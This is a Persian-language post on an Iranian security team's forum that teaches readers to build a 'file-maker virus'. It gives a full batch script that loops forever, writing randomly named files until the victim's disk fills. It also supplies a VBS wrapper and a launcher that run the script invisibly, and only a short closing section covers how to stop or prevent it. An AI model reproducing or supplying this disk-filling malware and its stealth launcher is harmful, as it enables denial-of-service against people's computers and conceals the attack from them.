رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ویروس فایل ساز


SRX
 اشتراک گذاری

ارسال های توصیه شده

سلام عرض می کنم خدمت همه شما دوستان خوبم!!!

 

راستش رو بخواین من توی یه تاپیک چیزی رو دیدم و ازش خوشم اومد و یه مقدار تغییر دادمش تا بتونه به تعداد نامحدودی فایل بسازه و حجم دیوایس رو پر کنه و تبدیل به یه ویروس  نه چندان خطرناک بشه

لینک تاپیک مربوطه

خب شروع کنیم...

 

برای شروع داخل یک  تکست ادیتور مثل Notepad رو اجرا کنید و متن زیر رو درونش کپی کنید.  توضیح خواهم داد.

:A
@echo off
title SRX
:A
echo    Guardiran Security Team > %random%SRX%random%Guardiran%random%
goto a

 

title نام فایل اجرایی ماست که می تونید به دلخواه عوضش کنید.

Guardiran Security Team متنی هست که می خواهیم درون فایل های ساخته شده قرار بگیره.

%random%SRX%random%Guardiran%random% هم چیزی است که روی  فایل ها می گذاریم، این قسمت هم می توانید به دلخواه عوض کنید.

 

فایل ساخته شده رو در دیوایس خود باز نکنید، -مخصوصا در دسکتاپ

 

اگر می خواهین حجم فایل ها بیشتر بشه فقط کافی متن داخل فایل یا خارج فایل رو بیشتر کنید.(ترجیحا متن درون فایل رو اضافه کنید)

یک فایل 10 کیلوبایتی نمی تونه به تنهایی کاری کنه اما وقتی هزاران فایل 10 کیلوبایتی کنار هم قرار می گیرند حتی حذف کردنشون هم سخت است!!

 

*********************************************************************************************************

خب کار اصلی ما تمام شد و شما می توانید دیگر ادامه ندهید و با همین فایل کار خود را انجام دهید.

اما برای تمیزی کار چند فایل دیگر هم باید بسازیم...

ابتدا فایلی با نام invisible.vbs بسازید و متن زیر رو درونش کپی کنید. (حتما فرمت فایل .vbs باشد)

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

این فایل برای مخفی سازی فایل درحال اجرا است.

 

فایل دیگر با نام Launcher.bat می سازیم و کنار فایل ها قرار می دهیم. (کد زیر را درون فایل Launcher.bat کپی کنید)

wscript.exe "invisible.vbs" "file.bat"

این فایلیه که شما باید اونو اجرا کنید.

 

توضیحات

نام ویروس ما file.bat است. و فقط جنبه اجرایی دارد.

فایل بعدی یعنی invisible.vbs برای پنهان سازی file.bat ساخته شده و به تنهایی هیچ کاری نمی توانه بکنه.

فایل سوم یعنی Launcher.bat هم برای اجرای file.bat به صورت مخفی به کار میره. (فایلی که شما باید آن را اجرا کنید)

 

راه های غیر فعال کردن در حالت مخفی

1. وارد Task Manager شوید، wscript.exe را پیدا کنید و روی آن کلیک راست کنید و گزینه End Task را انتخاب کنید.

2. سیستم را خاموش یا ریستارت کنید.

 

راه های جلوگیری

هر فایلی رو باز نکنید و تا اونجایی که میتونید سورس فایل ها رو قبل از اجرا بررسی کنید.

در صورت کند شدن سرعت سیستم عامل حتما Task Manager رو چک کنید و اگر نرم افزار بیش از حد داشت از CPU و RAM کار می کشید اون رو غیر غعال کنید.

 

موفق باشید.

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...